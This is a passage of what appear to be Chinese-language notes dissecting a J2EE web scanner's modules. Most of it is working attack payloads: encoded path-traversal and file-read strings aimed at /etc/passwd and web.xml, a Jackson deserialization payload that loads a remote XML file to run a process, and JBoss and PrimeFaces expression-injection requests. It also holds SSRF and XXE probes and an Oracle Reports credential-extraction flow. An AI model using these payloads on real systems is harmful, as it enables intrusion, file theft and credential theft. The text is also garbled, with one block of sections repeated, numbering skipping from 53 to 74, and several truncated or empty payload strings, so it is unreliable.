            "/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af",
            "/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af",
            "/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c",
            "/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\",
            "/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c",
            "/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\",
            "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f",
            "/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f",
            "/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f",
            "/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/",
            "/..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\",
            "/..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../",
            "%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2/%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2",
            "/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c",
            "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\",
            "/static/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f",
            "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\",
            "....//....//....//....//....//....//....//....//"
    );
 
  
payload2
 
  
      {
            put("etc/passwd", Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
            put("windows\\win.ini", Pattern.compile("for 16\\-bit app support", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
        }
 
  
12拼接
 match的值在payload2里面
 
  
【26】JacksonDataBindCVE20177525
 
  
payload
 
  
        PAYLOADS.add("{\"param\":[\"org.springframework.context.support.FileSystemXmlApplicationContext\",\"http://%s/spel.xml\"]}");

 
  
match dnslog 就行
 
  
远程代码执行
 这个spel.xml内容里面可以自定义命令
 
  
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xsi:schemaLocation="
 http://www.springframework.org/schema/beans
 http://www.springframework.org/schema/beans/spring-beans.xsd
">
 <bean id="pb" class="java.lang.ProcessBuilder">
 <constructor-arg value="/Applications/Calculator.app/Contents/MacOS/Calculator" />
 <property name="whatever" value="#{ pb.start() }"/>
 </bean>
</beans>
 
  
【27】JavascriptSSRF - ReactJS SSRF
 
  
payload
 
  
String payload = "fetch('https://%s')";
 
  
match dnslog
 这个fetch 不仅仅可以打http协议的 file协议的也可以
 
  
【28】JavaServerFacesTraversal
 
  
payload
 
  
List<String> jsfTraversal = new ArrayList<>();
        jsfTraversal.add("javax.faces.resource.../WEB-INF/web.xml.jsf");
        jsfTraversal.add("javax.faces.resource.../WEB-INF/web.xml.xhtml");
        jsfTraversal.add("javax.faces.resource./WEB-INF/web.xml.jsf?ln=..");
        jsfTraversal.add("javax.faces.resource/…\\\\WEB-INF/web.xml"); 
        jsfTraversal.add("jenia4faces/template/../WEB-INF/web.xml/ ");
        
        jsfTraversal.add("/faces/javax.faces.resource/web.xml?ln=..\\\\WEB-INF");
        jsfTraversal.add("/faces/javax.faces.r`eso`urce/..\\\\WEB-INF/web.xml");
        jsfTraversal.add("/faces/javax.faces.resource/web.xml?loc=../WEB-INF");

 
  
match到下面就证明能读取到。
 
  
    static {
        DETECTION_REGEX.add(Pattern.compile("javax.faces.", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
    }

 
  
【29】JBossAdminConsole
 
  
先fuzz目录
 
  
 private static final List<String> JBOSS_ADMIN_PATHS = Arrays.asList(
            "/admin-console/login.seam;jsessionid=4416F53DDE1DBC8081CDBDCDD1666FB0"
    );
 
  
match返回包
 
  
    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "".getBytes(),
            "".getBytes(),
            "".getBytes()
    );
 
  
则认为是控制台泄露
 
  
然后match是否有登录表单
 
  
    private static final Pattern VIEWSTATE_PATTERN = Pattern.compile("id=\"javax.faces.ViewState\" value=\"(.*?)\"");

 
  
然后就可以进行弱口令爆破了
 
  
【30】testJBossSEAMAdminCVE20101871
 
  
如果存在控制台
 则可以接着尝试CVE20101871
 这是一个模板注入
 
  
payload
 
  
headers.add("POST " + JBOSS_ADMIN_PATHS.get(0) + " HTTP/1.1");
        headers.add("Host: " + url.getHost() + ":" + url.getPort());
        headers.add("Content-Type: application/x-www-form-urlencoded");
        headers.add("Cookie: JSESSIONID=4416F53DDE1DBC8081CDBDCDD1666FB0");

        String body = "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime')}";

 
  
比较老的漏洞seam组件中插入#{payload}进行模板注入，
 
  
match的是反射获取的类。这里可以改成更无害一点的payload，例如随机数相加。
 
  
java
    private static final byte[] GREP_STRING_CVE20101871 = "public+static+java.lang.Runtime+java.lang.Runtime.getRuntime".getBytes();
 
  
【31】JBossjBPMAdminConsole
 
  
JBoss jBPM Admin Console
 
  
请求path
 
  
    private static final List<String> JBOSS_jBPM_PATHS = Arrays.asList(
            "/jbpm-console/app/tasks.jsf"
    );
 
  
match
 
  
    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "".getBytes()
    );
 
  
 
  
【32】 JBossJMXInvoker RCE
 
  
漏洞path
 
  
    private static final List<String> JBOSS_INVOKER_PATHS = Arrays.asList(
            "/invoker/EJBInvokerServlet",
            "/invoker/JMXInvokerServlet"
    );   
 
  
match
 
  
    private static final byte[] GREP_STRING = "org.jboss.invocation.MarshalledValue".getBytes();

 
  
是个反序列化，判定的是能不能下载
 
 
  
【33】JBossJMXReadOnly - RCE
 
  
路径
 
  
private static final List<String> JBOSS_INVOKER_PATHS = Arrays.asList(
            "/invoker/readonly"
    );
 
  
匹配
 
  
    private static final byte[] GREP_STRING = "org.jboss.invocation.http.servlet.ReadOnlyAccessFilter".getBytes();

 
  
这是个命令执行
 
 
  
【34】JBossJuddi
 
  
路径
 
  
private static final List<String> JBOSS_WS = Arrays.asList(
            "/juddi/"
    );
 
  
match
 
  
 private static final byte[] GREP_STRING = ">JBoss JUDDI".getBytes();
 
  
只能说明 JBoss Juddi console 控制台泄露，不能证明有漏洞
 
  
【35】JBossWebConsole
 
  
路径
 
  
 private static final List<String> JBOSS_ADMIN_PATHS = Arrays.asList(
            "/web-console/",
            "/jmx-console/"
    );
 
  
match
 
  
    private static final byte[] GREP_STRING_JMX = "HtmlAdaptor?action=displayMBeans".getBytes();
    private static final byte[] GREP_STRING_WEB = "ServerInfo.jsp\"".getBytes();
 
  
一个是web路径 一个jmx路径
 这种如果管理员没有配置账号密码，则存在未授权，因为是管理WEB的，所以直接RCE。
 
 
  
【36】JBossWS
 
  
路径
 
  
private static final List<String> JBOSS_WS = Arrays.asList(
            "/jbossws/services"
    );
 
  
match
 
  
    private static final Pattern JBOSSWS_RE = Pattern.compile("JBossWS/Services

", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE);

这个会暴露所有的web服务，也属于控制台泄露，信息收集。

【37】JettyRemoteLeakage

payload

    private static final byte[] INJ_TEST = {(byte) 0};

发送一个byte
match

    private static final byte[] GREP_STRING = "400 Illegal character 0x0 in state".getBytes();

Jetty web server 远程共享缓冲区信息泄漏漏洞

原理大概是错误信息把缓冲区的东西带出来了。

【38】JKStatus

路径

    private static final List<String> JK_ENDPOINTS = Arrays.asList(
            "/jk-status",
            "/jkstatus-auth",
            "/jkstatus",
            "/jkmanager",
            "/jkmanager-auth",
            "/jdkstatus"
    );   

match

    private static final byte[] GREP_STRING = "JK Status Manager".getBytes();

未授权访问远程WEB 用户的一些信息

【39】LFIAbsoluteModule

payload

    private static final List<byte[]> LFI_INJECTION_TESTS = Arrays.asList(
            ".../....///.../....///.../....///.../....///.../....///.../....///etc/passwd".getBytes(),
            ".../...//.../...//.../...//.../...//.../...//.../...//.../...//.../...//etc/passwd".getBytes(),
            "../../../../../../../../../../../../../../../../etc/passwd%00.html".getBytes(),
            "file:///c:/windows/win.ini".getBytes(),
            "file:///etc/passwd".getBytes(),
            "file://\\/\\/etc/passwd".getBytes(),
            "%2fetc%2fpasswd".getBytes(),
            "../../../../../../../../../../../../../../../../windows/win.ini".getBytes(),
            "../../../../../../../../../../../../../../../../windows/win.ini%00.html".getBytes()
    );    

通用型的任意文件读取

【40】LFIModule

payload

    private static final List<byte[]> LFI_INJECTION_TESTS = Arrays.asList(
            "../../../../WEB-INF/web.xml".getBytes(),
            "../../../WEB-INF/web.xml".getBytes(),
            "../../WEB-INF/web.xml".getBytes(),
            "../WEB-INF/web.xml".getBytes(),
            "%c0%ae/WEB-INF/web.xml".getBytes(),
            "%c0%ae/%c0%ae/WEB-INF/web.xml".getBytes(),
            "%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml".getBytes(),
            "%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml".getBytes(),
            // Spring Webflow payloads
            "../../../WEB-INF/web.xml;x=".getBytes(),
            "../../WEB-INF/web.xml;x=".getBytes(),  
            "../WEB-INF/web.xml;x=".getBytes(),
            "WEB-INF/web.xml".getBytes(),
            ".//WEB-INF/web.xml".getBytes()
    );    
    

match

    private static final byte[] GREP_STRING = ".getBytes();

这是读web目录，通用型的任意文件读取。

【41】NextFrameworkPathTraversal

payload

    private static final String NEXT_TRAVERSAL = "/_next/../../../../../../../../../etc/passwd";

nextjs的任意文件读取

修复的话对传入的path做了判断

【42】NodeJSPathTraversal nodejs路径穿越

payload

    private static final String NODEJS_TRAVERSAL = "../../../j/../../../../etc/passwd";

修复mr：https://github.com/nodejs/node/commit/b98e8d995efb426bbdee56ce503017bdcbbc6332

【43】NodeJSRedirect

payload

    private static final String NODEJS_PATH = "///www.example.com/%2e%2e";

路由问题导致的URL跳转
match是否location即可

 if (nodejsInfo.getStatusCode() == 301
                        || nodejsInfo.getStatusCode() == 302
                        || nodejsInfo.getStatusCode() == 303) {

                    String locationHeader = HTTPParser.getResponseHeaderValue(nodejsInfo, "Location");

                    if (locationHeader != null && locationHeader.startsWith("/www.example.com")) {

【44】NodeJSResponseSplitting CVE-2016-2216

响应拆分漏洞
payload

    private static final byte[] NODEJS_INJ = "%c4%8d%c4%8aInjectionHeader:%2020%c4%8d%c4%8a".getBytes();

match是从返回包头找有没有插进去

【45】OASConfigFilesDisclosure

path

private static final List<String> OAS_PATHS = Arrays.asList(
            "/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml",
            "/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml",
            "/xsql/lib/XSQLConfig.xml",
            "/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml",
            "/globals.jsa",
            "/demo/ojspext/events/globals.jsa",
            // Dynamic Monitoring Services 
            "/dms/AggreSpy",
            "/soap/servlet/Spy",
            "/servlet/Spy",
            "/servlet/DMSDump",
            "/dms/DMSDump",
            // Oracle Java Process Manager 
            "/oprocmgr-status",
            "/oprocmgr-service",
            "/soap/servlet/soaprouter",
            "/fcgi-bin/echo",
            "/fcgi-bin/echo2",
            "/fcgi-bin/echo.exe",
            "/fcgi-bin/echo2.exe",
            // BC4J Runtime Parameters            
            "/webapp/wm/runtime.jsp"
            
            //TODO CVE-2002-0565
//            "/_pages/_webapp/_admin/_showpooldetails.java",
//            "/_pages/_webapp/_admin/_showjavartdetails.java",
//            "/_pages/_webapp/_jsp/",
//            "/_pages/_demo/",
//            "/_pages/_demo/_sql/_pages/",
//            "/OA_HTML/AppsLocalLogin.jsp"
    );

返回包match

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "SOAP configuration file".getBytes(),
            "On a PRODUCTION system".getBytes(),
            "<%".getBytes(),
            ".getBytes(),
            "DMS Metrics".getBytes(),
            "Current Metric Values".getBytes(),
            "Process Status".getBytes(),
            "SOAP Server".getBytes(),
            "DOCUMENT_ROOT=".getBytes(),
            "BC4J Runtime Parameters".getBytes()
    );

02年的洞
可以理解为oracle一些敏感文件的泄露，感觉现在应该不太可能有了，20年了。

【46】OASSqlnetLogDisclosure

path

private static final List<String> SQLNETLOG_PATHS = Arrays.asList(
            "/sqlnet.log"
    );

match

private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "VERSION INFORMATION".getBytes()
    );

sql的一写日志泄露。

【47】OracleCGIPrintEnv

path

private static final List<String> CGIENV_PATHS = Arrays.asList(
            "/cgi-bin/printenv"
    );

match

 private static final byte[] GREP_STRINGS = "DOCUMENT_ROOT".getBytes();

同样的是敏感信息泄露。

【48】OracleEBSSSRF - CVE-2017-10246

payload

        String Oracle_SSRF_Help = String.format("/OA_HTML/help?locale=en_AE&group=per:br_prod_HR:US&topic=http://%s:80/", currentCollaboratorPayload);

是个前台的洞

【49】OracleEBSSSRFLCMServiceController - CVE-2018-3167

payload

        String oracleSSRFDoctypePayload = String.format("", currentCollaboratorPayload);

是一个XXE 漏洞，可以打SSRF

【50】OracleReportService

path

    private static final List<String> ORACLE_REPORT_SERVICE_PATHS = Arrays.asList(
            "/reports/rwservlet/getserverinfo",
            "/reports/rwservlet/showenv",
            "/reports/rwservlet/showjobs",
            "/reports/rwservlet/showmap"
    );

match

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "Successful Jobs".getBytes(),
            "Servlet Environment Variables".getBytes(),
            "Reports Server Queue Status".getBytes(),
            "Reports Servlet Key Map".getBytes()
    );

这里面的路径都是敏感信息泄露。
其中

                                if (ORACLE_REPORT_SERVICE_PATH.equalsIgnoreCase("/reports/rwservlet/showmap")) {

格外关键，将rsp保存下来单独分析。
按行读取

String[] lines = helpers.bytesToString(showMapPage).split("\n")

找到行中包含

OraInstructionText

并进行match

    private static final Pattern REPORT_SERVICE_KEY_PATTERN = Pattern.compile("OraInstructionText>([^<]+)<");

如果通过上面正则，没有找到了如下的key

private static final List<String> KEYMAPS_TO_IGNORE = Arrays.asList(
            "%ENV_NAME%",
            "barcodepaper",
            "barcodeweb",
            "breakbparam",
            "charthyperlink_ias",
            "charthyperlink_ids",
            "distributionpaper",
            "express",
            "orqa",
            "parmformjsp",
            "pdfenhancements",
            "report_defaultid",
            "report_secure",
            "run",
            "runp",
            "tutorial",
            "xmldata"
    );

则把匹配到的key拼接，然后发起请求

        String RWSERVLET_PARSEQUERY_URL = "/reports/rwservlet/parsequery?";
                        URL urlToTest = new URL(protocol, url.getHost(), url.getPort(), RWSERVLET_PARSEQUERY_URL + key);

预期是请求得到username 和pwd

    private static final Pattern PWD_DISCLOSURE_PATTERN = Pattern.compile("userid=([^/]+)/([^@]+)@([^ \\t]+)([ \\t]|$)");

预期的rsp

05年的洞，估计也基本没有了。

【41】NextFrameworkPathTraversal

payload

    private static final String NEXT_TRAVERSAL = "/_next/../../../../../../../../../etc/passwd";

nextjs的任意文件读取

修复的话对传入的path做了判断

【42】NodeJSPathTraversal nodejs路径穿越

payload

    private static final String NODEJS_TRAVERSAL = "../../../j/../../../../etc/passwd";

修复mr：https://github.com/nodejs/node/commit/b98e8d995efb426bbdee56ce503017bdcbbc6332

【43】NodeJSRedirect

payload

    private static final String NODEJS_PATH = "///www.example.com/%2e%2e";

路由问题导致的URL跳转
match是否location即可

 if (nodejsInfo.getStatusCode() == 301
                        || nodejsInfo.getStatusCode() == 302
                        || nodejsInfo.getStatusCode() == 303) {

                    String locationHeader = HTTPParser.getResponseHeaderValue(nodejsInfo, "Location");

                    if (locationHeader != null && locationHeader.startsWith("/www.example.com")) {

【44】NodeJSResponseSplitting CVE-2016-2216

响应拆分漏洞
payload

    private static final byte[] NODEJS_INJ = "%c4%8d%c4%8aInjectionHeader:%2020%c4%8d%c4%8a".getBytes();

match是从返回包头找有没有插进去

【45】OASConfigFilesDisclosure

path

private static final List<String> OAS_PATHS = Arrays.asList(
            "/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml",
            "/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml",
            "/xsql/lib/XSQLConfig.xml",
            "/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml",
            "/globals.jsa",
            "/demo/ojspext/events/globals.jsa",
            // Dynamic Monitoring Services 
            "/dms/AggreSpy",
            "/soap/servlet/Spy",
            "/servlet/Spy",
            "/servlet/DMSDump",
            "/dms/DMSDump",
            // Oracle Java Process Manager 
            "/oprocmgr-status",
            "/oprocmgr-service",
            "/soap/servlet/soaprouter",
            "/fcgi-bin/echo",
            "/fcgi-bin/echo2",
            "/fcgi-bin/echo.exe",
            "/fcgi-bin/echo2.exe",
            // BC4J Runtime Parameters            
            "/webapp/wm/runtime.jsp"
            
            //TODO CVE-2002-0565
//            "/_pages/_webapp/_admin/_showpooldetails.java",
//            "/_pages/_webapp/_admin/_showjavartdetails.java",
//            "/_pages/_webapp/_jsp/",
//            "/_pages/_demo/",
//            "/_pages/_demo/_sql/_pages/",
//            "/OA_HTML/AppsLocalLogin.jsp"
    );

返回包match

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "SOAP configuration file".getBytes(),
            "On a PRODUCTION system".getBytes(),
            "<%".getBytes(),
            ".getBytes(),
            "DMS Metrics".getBytes(),
            "Current Metric Values".getBytes(),
            "Process Status".getBytes(),
            "SOAP Server".getBytes(),
            "DOCUMENT_ROOT=".getBytes(),
            "BC4J Runtime Parameters".getBytes()
    );

02年的洞
可以理解为oracle一些敏感文件的泄露，感觉现在应该不太可能有了，20年了。

【46】OASSqlnetLogDisclosure

path

private static final List<String> SQLNETLOG_PATHS = Arrays.asList(
            "/sqlnet.log"
    );

match

private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "VERSION INFORMATION".getBytes()
    );

sql的一写日志泄露。

【47】OracleCGIPrintEnv

path

private static final List<String> CGIENV_PATHS = Arrays.asList(
            "/cgi-bin/printenv"
    );

match

 private static final byte[] GREP_STRINGS = "DOCUMENT_ROOT".getBytes();

同样的是敏感信息泄露。

【48】OracleEBSSSRF - CVE-2017-10246

payload

        String Oracle_SSRF_Help = String.format("/OA_HTML/help?locale=en_AE&group=per:br_prod_HR:US&topic=http://%s:80/", currentCollaboratorPayload);

是个前台的洞

【49】OracleEBSSSRFLCMServiceController - CVE-2018-3167

payload

        String oracleSSRFDoctypePayload = String.format("", currentCollaboratorPayload);

是一个XXE 漏洞，可以打SSRF

【50】OracleReportService

path

    private static final List<String> ORACLE_REPORT_SERVICE_PATHS = Arrays.asList(
            "/reports/rwservlet/getserverinfo",
            "/reports/rwservlet/showenv",
            "/reports/rwservlet/showjobs",
            "/reports/rwservlet/showmap"
    );

match

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "Successful Jobs".getBytes(),
            "Servlet Environment Variables".getBytes(),
            "Reports Server Queue Status".getBytes(),
            "Reports Servlet Key Map".getBytes()
    );

这里面的路径都是敏感信息泄露。
其中

                                if (ORACLE_REPORT_SERVICE_PATH.equalsIgnoreCase("/reports/rwservlet/showmap")) {

格外关键，将rsp保存下来单独分析。
按行读取

String[] lines = helpers.bytesToString(showMapPage).split("\n")

找到行中包含

OraInstructionText

并进行match

    private static final Pattern REPORT_SERVICE_KEY_PATTERN = Pattern.compile("OraInstructionText>([^<]+)<");

如果通过上面正则，没有找到了如下的key

private static final List<String> KEYMAPS_TO_IGNORE = Arrays.asList(
            "%ENV_NAME%",
            "barcodepaper",
            "barcodeweb",
            "breakbparam",
            "charthyperlink_ias",
            "charthyperlink_ids",
            "distributionpaper",
            "express",
            "orqa",
            "parmformjsp",
            "pdfenhancements",
            "report_defaultid",
            "report_secure",
            "run",
            "runp",
            "tutorial",
            "xmldata"
    );

则把匹配到的key拼接，然后发起请求

        String RWSERVLET_PARSEQUERY_URL = "/reports/rwservlet/parsequery?";
                        URL urlToTest = new URL(protocol, url.getHost(), url.getPort(), RWSERVLET_PARSEQUERY_URL + key);

预期是请求得到username 和pwd

    private static final Pattern PWD_DISCLOSURE_PATTERN = Pattern.compile("userid=([^/]+)/([^@]+)@([^ \\t]+)([ \\t]|$)");

预期的rsp

05年的洞，估计也基本没有了。

【51】PivotalSpringTraversal CVE-2014-3625

路径

private static final List<String> staticURLFolders = Arrays.asList(
            "/resources/",
            "/files/",
            "/upload/",
            "/static/",
            "/content/",
            "/html/",
            "/deploy/"
    );

先判断真实的路径中有没有上述的path

        for (String staticResourceFolder : staticURLFolders) {

            if (currentPath.contains(staticResourceFolder)) {

然后将原始的HTTP做一个替换

                String mutatedHTTPRequest = mutator(HTTPRequest, staticResourceFolder, staticResourceFolder + INJ);

替换的payload是

    private static final String INJ = "file:/etc/passwd";

mutator函数就是一个找正则然后replace

    private String mutator(String httpRequest, String staticResourceFolder, String payload) {
        return httpRequest.replaceFirst(staticResourceFolder + ".* ", payload + " ");
    }

【52】PrimeFacesELInjection - CVE-2017-1000486

payload

        PAYLOADS.add("/javax.faces.resource/j2eescan.xhtml?pfdrt=sc&ln=primefaces&pfdrid=" + PrimeFacesELInjection.INJ_TEST);
        PAYLOADS.add("/javax.faces.resource/j2eescan.jsf?pfdrt=sc&ln=primefaces&pfdrid=" + PrimeFacesELInjection.INJ_TEST);

    private static final String INJ_TEST = "uMKljPgnOTVxmOB%2bH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVYjEh7SE3F4WmfKUle6apy2QGwABuVlzurPsgFxYP0G3b1dDqmgmxMw%3d%3d";

match返回包则存在漏洞

   if (header.contains("J2EESCANPRIME")) {

这是个RCE
关键是这个pfdrid参数，是EL表达式的加密结果。
这里payload是加密下面的表达式，所以判断返回包是看headers

"${facesContext.getExternalContext().setResponseHeader(\\\"J2EESCANPRIME\\\",\\\"primefaces\\\")}"

默认密码是

Default = primefaces

利用工具看这个

https://github.com/pimps/CVE-2017-1000486

【53】RESTAPISwagger

REST API Swagger 的相关问题
相关路径

    private static final List<String> SWAGGER_APIS = Arrays.asList(
            "/swagger-ui.html",
            "/swagger/swagger-ui.html",
            "/api/swagger-ui.html",
            "/swagger/index.html",
            "/%20/swagger-ui.html"
    );

这个我们见得比较多了，这里面能拿到服务端的一些API构造。
match

 private static final byte[] GREP_STRING = "".getBytes()
    );

则存在漏洞

这是个任意文件上传的测试页面，不需要权限控制

【74】XInclude 任意文件上传

payload一把锁

    private static final List<byte[]> XINCLUDE_INJ_TESTS = Arrays.asList(
            "".getBytes());  

【75】XXEModule

payload

    private static final String XXE_DTD_DEFINITION = "]>";

这是可回显的，看着像是通用性的一个插件

【76】XXEParameterModule

payload

    private static final List<byte[]> XXE_INJECTION_TESTS = Arrays.asList(
            "]>&xxe;".getBytes(),
            // https://twitter.com/Agarri_FR/status/656440244116574208
            " %dtd;]>]]>".getBytes()
            );

一样的
一个是打did一个是直接解析回显
match

    private static final List<Pattern> XXE_RE_MATCHES = Arrays.asList(
            Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
            Pattern.compile("file not found", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
            Pattern.compile("java\\.io\\.FileNotFoundException", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));

但通常打did不用file测试，用http协议会比较常见可以打DNSlog

后话

Down